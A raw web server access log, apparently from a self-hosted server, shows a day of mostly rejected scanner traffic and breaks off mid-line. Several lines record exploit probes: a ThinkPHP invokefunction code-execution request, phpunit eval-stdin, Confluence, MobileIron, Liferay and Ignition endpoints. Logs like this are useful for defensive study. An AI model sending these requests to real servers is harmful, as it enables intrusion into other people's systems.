[15/Sep/2021:16:58:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 205.185.119.4] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" "http://64.22.31.253:443/left.html" [15/Sep/2021:17:02:04 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Sep/2021:17:02:04 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Sep/2021:17:02:04 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Sep/2021:17:02:04 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Sep/2021:17:02:04 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Sep/2021:17:02:04 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Sep/2021:17:08:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 142.93.144.122] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Sep/2021:18:23:16 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Sep/2021:18:36:44 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.14.209.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Sep/2021:19:23:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Sep/2021:20:49:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 201.150.45.59] [Length 0] [Gzip -] "libwww-perl/6.56" "-" [15/Sep/2021:20:50:36 +0000] 444 - GET https pop.moralanimal.net "/" [Client 61.135.15.160] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; OPPO x20 70816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [15/Sep/2021:21:22:26 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:26 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:29 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:29 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:31 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [15/Sep/2021:21:22:32 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:33 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:35 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:37 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:39 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:21:22:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:22:23:37 +0000] 444 - GET https help.moralanimal.net "/" [Client 34.86.35.20] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [15/Sep/2021:22:37:57 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 74.120.14.44] [Length 0] [Gzip -] "-" "-" [15/Sep/2021:22:37:58 +0000] 400 - GET http whoami.moralanimal.net "/" [Client 74.120.14.44] [Length 252] [Gzip -] "-" "-" [15/Sep/2021:22:37:58 +0000] 400 - GET http whoami.moralanimal.net "/" [Client 74.120.14.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [16/Sep/2021:00:08:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.216.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Sep/2021:00:09:15 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.209.223] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Sep/2021:00:11:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.209.88] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Sep/2021:00:59:00 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:00:59:01 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:02:17:33 +0000] 400 - GET http localhost "/recordings/theme/main.css" [Client 77.247.108.81] [Length 154] [Gzip -] "gbrmss/7.29.0" "-" [16/Sep/2021:02:40:24 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:02:40:25 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:02:41:30 +0000] 400 - HEAD http localhost "/" [Client 143.198.34.141] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:02:41:30 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 143.198.34.141] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:30 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 143.198.34.141] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:30 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 143.198.34.141] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:30 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 143.198.34.141] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:30 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 143.198.34.141] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:31 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 143.198.34.141] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:31 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 143.198.34.141] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:31 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 143.198.34.141] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:31 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 143.198.34.141] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [16/Sep/2021:02:41:31 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 143.198.34.141] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [16/Sep/2021:02:41:31 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 143.198.34.141] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:02:41:31 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 143.198.34.141] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [16/Sep/2021:03:17:25 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.211.149] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Sep/2021:03:49:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [16/Sep/2021:03:50:46 +0000] 444 - POST https community.moralanimal.net "/pages/createpage-entervariables.action?SpaceKey=x" [Client 103.76.55.18] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1" "-" [16/Sep/2021:03:56:15 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:03:56:15 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:04:55:11 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:05:15:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.152] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:05:22:50 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:05:36:23 +0000] 400 - - http localhost "-" [Client 185.156.72.25] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:05:36:23 +0000] 400 - - http localhost "-" [Client 185.156.72.25] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:06:10:01 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:07:17:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.220.236] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Sep/2021:08:23:56 +0000] 400 - - http localhost "-" [Client 121.46.25.189] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:23:57 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 252] [Gzip -] "\x22Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML" "-" [16/Sep/2021:08:23:58 +0000] 400 - GET http 64.22.31.253 "/" [Client 121.46.25.189] [Length 252] [Gzip -] "like Gecko) Version/5.1 Safari/534.50\x22" "-" [16/Sep/2021:08:23:58 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 252] [Gzip -] "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10" "-" [16/Sep/2021:08:24:00 +0000] 400 - - https localhost "-" [Client 121.46.25.189] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:24:01 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 0] [Gzip -] "2.0.1) Gecko/20100101 Firefox/4.0.1\x22" "-" [16/Sep/2021:08:24:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 121.46.25.189] [Length 0] [Gzip -] "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10" "-" [16/Sep/2021:08:41:39 +0000] 444 - POST https 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 138.68.161.204] [Length 0] [Gzip -] "python-requests/2.18.4" "-" [16/Sep/2021:08:53:44 +0000] 444 - GET https localhost "/" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:08:53:44 +0000] 444 - OPTIONS https localhost "/" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:08:53:44 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:08:53:45 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:53:50 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:08:53:50 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:53:50 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:53:50 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:53:50 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:53:50 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:53:50 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:08:55:36 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:36 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 50.31.21.10] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:36 +0000] 444 - GET https localhost "/" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:08:55:37 +0000] 400 - GET http localhost "/" [Client 50.31.21.10] [Length 252] [Gzip -] "-" "-" [16/Sep/2021:08:55:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:08:55:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 50.31.21.10] [Length 252] [Gzip -] "-" "-" [16/Sep/2021:08:55:38 +0000] 444 - GET https 64.22.31.253 "/nmaplowercheck1631782505" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:38 +0000] 400 - GET http 64.22.31.253 "/nmaplowercheck1631782505" [Client 50.31.21.10] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:38 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:38 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 50.31.21.10] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:38 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:38 +0000] 400 - HEAD http 64.22.31.253 "/" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 50.31.21.10] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:39 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:08:55:40 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 50.31.21.10] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" "-" [16/Sep/2021:10:20:00 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:10:20:00 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:10:54:38 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:10:54:38 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:10:56:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 142.93.39.181] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" "-" [16/Sep/2021:12:23:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.217.137] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Sep/2021:12:45:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Sep/2021:13:50:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.122] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Sep/2021:14:06:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [16/Sep/2021:14:13:07 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Sep/2021:14:56:31 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:31 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:34 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:34 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:36 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [16/Sep/2021:14:56:37 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:38 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:39 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:40 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:43 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:14:56:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Sep/2021:15:12:28 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:15:26:01 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:15:26:01 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Sep/2021:16:26:43 +0000] 444 - GET https 